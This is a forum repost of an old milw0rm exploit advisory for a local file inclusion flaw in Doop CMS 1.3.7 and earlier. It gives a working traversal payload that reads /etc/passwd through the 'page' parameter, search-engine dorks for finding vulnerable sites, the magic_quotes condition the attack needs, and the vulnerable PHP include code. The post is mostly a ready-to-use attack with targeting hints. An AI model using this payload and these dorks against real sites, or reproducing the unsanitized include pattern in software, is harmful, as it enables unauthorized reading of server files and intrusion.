Guest Nemessis Posted April 27, 2008 Report Share Posted April 27, 2008 ______________________________________________________| DOOP CMS <=1.3.7 Local File Inclusion ||______________________________________________________| ______________________________________________________| vuln path: ?page=/../../../../../../../etc/passwd%00 || || dork: Doop CMS || dork2: powered by Doop CMS || | | work only if magic_quotes_gpc are set to OFF ||______________________________________________________| ______________________________________________________| vuln code: || line 544: || if (!isset($_REQUEST['page'])){ || $_REQUEST['page']=$homepage; || $cpage=$_REQUEST['page']; || } else { $cpage=$_REQUEST['page']; } || || line 646: || if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){| if (file_exists("pages/".$cpage.".htm")){ || include("pages/".$cpage.".htm"); || } || else include("pages/".$cpage.".html"); || } ||______________________________________________________| ______________________________________________________| greetz to: [url]http://vladii.wordpress.com[/url] || [url]http://rstcenter.com[/url] || [url]http://hackpedia.info[/url] || SlicK & Shocker & moubik & kw3 ||______________________________________________________| ______________________________________________________| @vladii 2007 ||______________________________________________________| # milw0rm.com [2007-10-15]http://milw0rm.org/exploits/4536 Quote Link to comment Share on other sites More sharing options...